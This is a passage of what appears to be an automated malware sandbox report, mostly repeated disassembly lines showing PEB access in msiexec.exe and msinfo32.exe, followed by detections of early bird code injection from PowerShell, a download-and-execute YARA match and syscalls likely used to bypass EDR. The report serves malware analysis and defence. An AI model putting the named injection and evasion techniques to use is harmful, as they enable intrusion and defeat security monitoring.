          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488C720 mov eax, dword ptr fs:[00000030h]11_2_2488C720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488C720 mov eax, dword ptr fs:[00000030h]11_2_2488C720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2492B73C mov eax, dword ptr fs:[00000030h]11_2_2492B73C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2492B73C mov eax, dword ptr fs:[00000030h]11_2_2492B73C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2492B73C mov eax, dword ptr fs:[00000030h]11_2_2492B73C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2492B73C mov eax, dword ptr fs:[00000030h]11_2_2492B73C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488273C mov eax, dword ptr fs:[00000030h]11_2_2488273C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488273C mov ecx, dword ptr fs:[00000030h]11_2_2488273C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488273C mov eax, dword ptr fs:[00000030h]11_2_2488273C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24849730 mov eax, dword ptr fs:[00000030h]11_2_24849730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24849730 mov eax, dword ptr fs:[00000030h]11_2_24849730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2491972B mov eax, dword ptr fs:[00000030h]11_2_2491972B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248CC730 mov eax, dword ptr fs:[00000030h]11_2_248CC730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24885734 mov eax, dword ptr fs:[00000030h]11_2_24885734
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2490F72E mov eax, dword ptr fs:[00000030h]11_2_2490F72E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485973A mov eax, dword ptr fs:[00000030h]11_2_2485973A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485973A mov eax, dword ptr fs:[00000030h]11_2_2485973A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488674D mov esi, dword ptr fs:[00000030h]11_2_2488674D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488674D mov eax, dword ptr fs:[00000030h]11_2_2488674D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488674D mov eax, dword ptr fs:[00000030h]11_2_2488674D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24863740 mov eax, dword ptr fs:[00000030h]11_2_24863740
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24863740 mov eax, dword ptr fs:[00000030h]11_2_24863740
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24863740 mov eax, dword ptr fs:[00000030h]11_2_24863740
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DE75D mov eax, dword ptr fs:[00000030h]11_2_248DE75D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24850750 mov eax, dword ptr fs:[00000030h]11_2_24850750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D4755 mov eax, dword ptr fs:[00000030h]11_2_248D4755
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24892750 mov eax, dword ptr fs:[00000030h]11_2_24892750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24892750 mov eax, dword ptr fs:[00000030h]11_2_24892750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24923749 mov eax, dword ptr fs:[00000030h]11_2_24923749
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484B765 mov eax, dword ptr fs:[00000030h]11_2_2484B765
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484B765 mov eax, dword ptr fs:[00000030h]11_2_2484B765
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484B765 mov eax, dword ptr fs:[00000030h]11_2_2484B765
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484B765 mov eax, dword ptr fs:[00000030h]11_2_2484B765
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24858770 mov eax, dword ptr fs:[00000030h]11_2_24858770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860770 mov eax, dword ptr fs:[00000030h]11_2_24860770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484D08D mov eax, dword ptr fs:[00000030h]11_2_2484D08D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DD080 mov eax, dword ptr fs:[00000030h]11_2_248DD080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DD080 mov eax, dword ptr fs:[00000030h]11_2_248DD080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485208A mov eax, dword ptr fs:[00000030h]11_2_2485208A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24855096 mov eax, dword ptr fs:[00000030h]11_2_24855096
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488909C mov eax, dword ptr fs:[00000030h]11_2_2488909C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487D090 mov eax, dword ptr fs:[00000030h]11_2_2487D090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487D090 mov eax, dword ptr fs:[00000030h]11_2_2487D090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E80A8 mov eax, dword ptr fs:[00000030h]11_2_248E80A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249160B8 mov eax, dword ptr fs:[00000030h]11_2_249160B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249160B8 mov ecx, dword ptr fs:[00000030h]11_2_249160B8
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC04E5 mov ecx, dword ptr fs:[00000030h]13_2_04EC04E5
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F4A4B0 mov eax, dword ptr fs:[00000030h]13_2_04F4A4B0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC64AB mov eax, dword ptr fs:[00000030h]13_2_04EC64AB
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF44B0 mov ecx, dword ptr fs:[00000030h]13_2_04EF44B0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F4C460 mov ecx, dword ptr fs:[00000030h]13_2_04F4C460
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEA470 mov eax, dword ptr fs:[00000030h]13_2_04EEA470
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEA470 mov eax, dword ptr fs:[00000030h]13_2_04EEA470
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEA470 mov eax, dword ptr fs:[00000030h]13_2_04EEA470
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE443 mov eax, dword ptr fs:[00000030h]13_2_04EFE443
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE443 mov eax, dword ptr fs:[00000030h]13_2_04EFE443
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE443 mov eax, dword ptr fs:[00000030h]13_2_04EFE443
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE443 mov eax, dword ptr fs:[00000030h]13_2_04EFE443
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE443 mov eax, dword ptr fs:[00000030h]13_2_04EFE443
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE443 mov eax, dword ptr fs:[00000030h]13_2_04EFE443
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE443 mov eax, dword ptr fs:[00000030h]13_2_04EFE443
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE443 mov eax, dword ptr fs:[00000030h]13_2_04EFE443
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EE245A mov eax, dword ptr fs:[00000030h]13_2_04EE245A
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EB645D mov eax, dword ptr fs:[00000030h]13_2_04EB645D
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EBE420 mov eax, dword ptr fs:[00000030h]13_2_04EBE420
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EBE420 mov eax, dword ptr fs:[00000030h]13_2_04EBE420
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EBE420 mov eax, dword ptr fs:[00000030h]13_2_04EBE420
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EBC427 mov eax, dword ptr fs:[00000030h]13_2_04EBC427
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F46420 mov eax, dword ptr fs:[00000030h]13_2_04F46420
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F46420 mov eax, dword ptr fs:[00000030h]13_2_04F46420
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F46420 mov eax, dword ptr fs:[00000030h]13_2_04F46420
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F46420 mov eax, dword ptr fs:[00000030h]13_2_04F46420
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F46420 mov eax, dword ptr fs:[00000030h]13_2_04F46420
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F46420 mov eax, dword ptr fs:[00000030h]13_2_04F46420
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F46420 mov eax, dword ptr fs:[00000030h]13_2_04F46420
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF8402 mov eax, dword ptr fs:[00000030h]13_2_04EF8402
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF8402 mov eax, dword ptr fs:[00000030h]13_2_04EF8402
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF8402 mov eax, dword ptr fs:[00000030h]13_2_04EF8402
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFC5ED mov eax, dword ptr fs:[00000030h]13_2_04EFC5ED
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFC5ED mov eax, dword ptr fs:[00000030h]13_2_04EFC5ED
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE5E7 mov eax, dword ptr fs:[00000030h]13_2_04EEE5E7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE5E7 mov eax, dword ptr fs:[00000030h]13_2_04EEE5E7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE5E7 mov eax, dword ptr fs:[00000030h]13_2_04EEE5E7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE5E7 mov eax, dword ptr fs:[00000030h]13_2_04EEE5E7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE5E7 mov eax, dword ptr fs:[00000030h]13_2_04EEE5E7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE5E7 mov eax, dword ptr fs:[00000030h]13_2_04EEE5E7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE5E7 mov eax, dword ptr fs:[00000030h]13_2_04EEE5E7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE5E7 mov eax, dword ptr fs:[00000030h]13_2_04EEE5E7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC25E0 mov eax, dword ptr fs:[00000030h]13_2_04EC25E0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE5CF mov eax, dword ptr fs:[00000030h]13_2_04EFE5CF
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE5CF mov eax, dword ptr fs:[00000030h]13_2_04EFE5CF
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC65D0 mov eax, dword ptr fs:[00000030h]13_2_04EC65D0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFA5D0 mov eax, dword ptr fs:[00000030h]13_2_04EFA5D0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFA5D0 mov eax, dword ptr fs:[00000030h]13_2_04EFA5D0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F405A7 mov eax, dword ptr fs:[00000030h]13_2_04F405A7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F405A7 mov eax, dword ptr fs:[00000030h]13_2_04F405A7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F405A7 mov eax, dword ptr fs:[00000030h]13_2_04F405A7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EE45B1 mov eax, dword ptr fs:[00000030h]13_2_04EE45B1
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EE45B1 mov eax, dword ptr fs:[00000030h]13_2_04EE45B1
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF4588 mov eax, dword ptr fs:[00000030h]13_2_04EF4588
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC2582 mov eax, dword ptr fs:[00000030h]13_2_04EC2582
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC2582 mov ecx, dword ptr fs:[00000030h]13_2_04EC2582
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE59C mov eax, dword ptr fs:[00000030h]13_2_04EFE59C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF656A mov eax, dword ptr fs:[00000030h]13_2_04EF656A
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF656A mov eax, dword ptr fs:[00000030h]13_2_04EF656A
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF656A mov eax, dword ptr fs:[00000030h]13_2_04EF656A
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC8550 mov eax, dword ptr fs:[00000030h]13_2_04EC8550
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC8550 mov eax, dword ptr fs:[00000030h]13_2_04EC8550
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE53E mov eax, dword ptr fs:[00000030h]13_2_04EEE53E
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE53E mov eax, dword ptr fs:[00000030h]13_2_04EEE53E
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE53E mov eax, dword ptr fs:[00000030h]13_2_04EEE53E
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE53E mov eax, dword ptr fs:[00000030h]13_2_04EEE53E
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEE53E mov eax, dword ptr fs:[00000030h]13_2_04EEE53E
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0535 mov eax, dword ptr fs:[00000030h]13_2_04ED0535
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0535 mov eax, dword ptr fs:[00000030h]13_2_04ED0535
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0535 mov eax, dword ptr fs:[00000030h]13_2_04ED0535
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0535 mov eax, dword ptr fs:[00000030h]13_2_04ED0535
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0535 mov eax, dword ptr fs:[00000030h]13_2_04ED0535
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0535 mov eax, dword ptr fs:[00000030h]13_2_04ED0535
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F56500 mov eax, dword ptr fs:[00000030h]13_2_04F56500
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F94500 mov eax, dword ptr fs:[00000030h]13_2_04F94500
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F94500 mov eax, dword ptr fs:[00000030h]13_2_04F94500
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F94500 mov eax, dword ptr fs:[00000030h]13_2_04F94500
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F94500 mov eax, dword ptr fs:[00000030h]13_2_04F94500
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F94500 mov eax, dword ptr fs:[00000030h]13_2_04F94500
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F94500 mov eax, dword ptr fs:[00000030h]13_2_04F94500
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F94500 mov eax, dword ptr fs:[00000030h]13_2_04F94500
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F3E6F2 mov eax, dword ptr fs:[00000030h]13_2_04F3E6F2
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F3E6F2 mov eax, dword ptr fs:[00000030h]13_2_04F3E6F2
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F3E6F2 mov eax, dword ptr fs:[00000030h]13_2_04F3E6F2
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F3E6F2 mov eax, dword ptr fs:[00000030h]13_2_04F3E6F2
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F406F1 mov eax, dword ptr fs:[00000030h]13_2_04F406F1
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F406F1 mov eax, dword ptr fs:[00000030h]13_2_04F406F1
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFA6C7 mov ebx, dword ptr fs:[00000030h]13_2_04EFA6C7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFA6C7 mov eax, dword ptr fs:[00000030h]13_2_04EFA6C7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFC6A6 mov eax, dword ptr fs:[00000030h]13_2_04EFC6A6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF66B0 mov eax, dword ptr fs:[00000030h]13_2_04EF66B0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC4690 mov eax, dword ptr fs:[00000030h]13_2_04EC4690
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC4690 mov eax, dword ptr fs:[00000030h]13_2_04EC4690
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFA660 mov eax, dword ptr fs:[00000030h]13_2_04EFA660
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFA660 mov eax, dword ptr fs:[00000030h]13_2_04EFA660
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8866E mov eax, dword ptr fs:[00000030h]13_2_04F8866E
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8866E mov eax, dword ptr fs:[00000030h]13_2_04F8866E
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF2674 mov eax, dword ptr fs:[00000030h]13_2_04EF2674
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EDC640 mov eax, dword ptr fs:[00000030h]13_2_04EDC640
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC262C mov eax, dword ptr fs:[00000030h]13_2_04EC262C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EDE627 mov eax, dword ptr fs:[00000030h]13_2_04EDE627
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF6620 mov eax, dword ptr fs:[00000030h]13_2_04EF6620
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF8620 mov eax, dword ptr fs:[00000030h]13_2_04EF8620
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED260B mov eax, dword ptr fs:[00000030h]13_2_04ED260B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED260B mov eax, dword ptr fs:[00000030h]13_2_04ED260B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED260B mov eax, dword ptr fs:[00000030h]13_2_04ED260B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED260B mov eax, dword ptr fs:[00000030h]13_2_04ED260B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED260B mov eax, dword ptr fs:[00000030h]13_2_04ED260B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED260B mov eax, dword ptr fs:[00000030h]13_2_04ED260B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED260B mov eax, dword ptr fs:[00000030h]13_2_04ED260B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02619 mov eax, dword ptr fs:[00000030h]13_2_04F02619
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F3E609 mov eax, dword ptr fs:[00000030h]13_2_04F3E609
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EE27ED mov eax, dword ptr fs:[00000030h]13_2_04EE27ED
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EE27ED mov eax, dword ptr fs:[00000030h]13_2_04EE27ED
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EE27ED mov eax, dword ptr fs:[00000030h]13_2_04EE27ED
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F4E7E1 mov eax, dword ptr fs:[00000030h]13_2_04F4E7E1
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ECC7C0 mov eax, dword ptr fs:[00000030h]13_2_04ECC7C0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F407C3 mov eax, dword ptr fs:[00000030h]13_2_04F407C3
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC07AF mov eax, dword ptr fs:[00000030h]13_2_04EC07AF
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F6678E mov eax, dword ptr fs:[00000030h]13_2_04F6678E
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC8770 mov eax, dword ptr fs:[00000030h]13_2_04EC8770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0770 mov eax, dword ptr fs:[00000030h]13_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02750 mov eax, dword ptr fs:[00000030h]13_2_04F02750
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02750 mov eax, dword ptr fs:[00000030h]13_2_04F02750
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F44755 mov eax, dword ptr fs:[00000030h]13_2_04F44755
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF674D mov esi, dword ptr fs:[00000030h]13_2_04EF674D
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF674D mov eax, dword ptr fs:[00000030h]13_2_04EF674D
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF674D mov eax, dword ptr fs:[00000030h]13_2_04EF674D
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F4E75D mov eax, dword ptr fs:[00000030h]13_2_04F4E75D
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC0750 mov eax, dword ptr fs:[00000030h]13_2_04EC0750
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F3C730 mov eax, dword ptr fs:[00000030h]13_2_04F3C730
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFC720 mov eax, dword ptr fs:[00000030h]13_2_04EFC720
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFC720 mov eax, dword ptr fs:[00000030h]13_2_04EFC720
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF273C mov eax, dword ptr fs:[00000030h]13_2_04EF273C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF273C mov ecx, dword ptr fs:[00000030h]13_2_04EF273C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF273C mov eax, dword ptr fs:[00000030h]13_2_04EF273C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFC700 mov eax, dword ptr fs:[00000030h]13_2_04EFC700
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC0710 mov eax, dword ptr fs:[00000030h]13_2_04EC0710
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF0710 mov eax, dword ptr fs:[00000030h]13_2_04EF0710
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F020F0 mov ecx, dword ptr fs:[00000030h]13_2_04F020F0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC80E9 mov eax, dword ptr fs:[00000030h]13_2_04EC80E9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EBA0E3 mov ecx, dword ptr fs:[00000030h]13_2_04EBA0E3
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F460E0 mov eax, dword ptr fs:[00000030h]13_2_04F460E0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EBC0F0 mov eax, dword ptr fs:[00000030h]13_2_04EBC0F0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Early bird code injection technique detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_1068.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1068, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5812, type: MEMORYSTR
          Found direct / indirect Syscall (likely to bypass EDR)
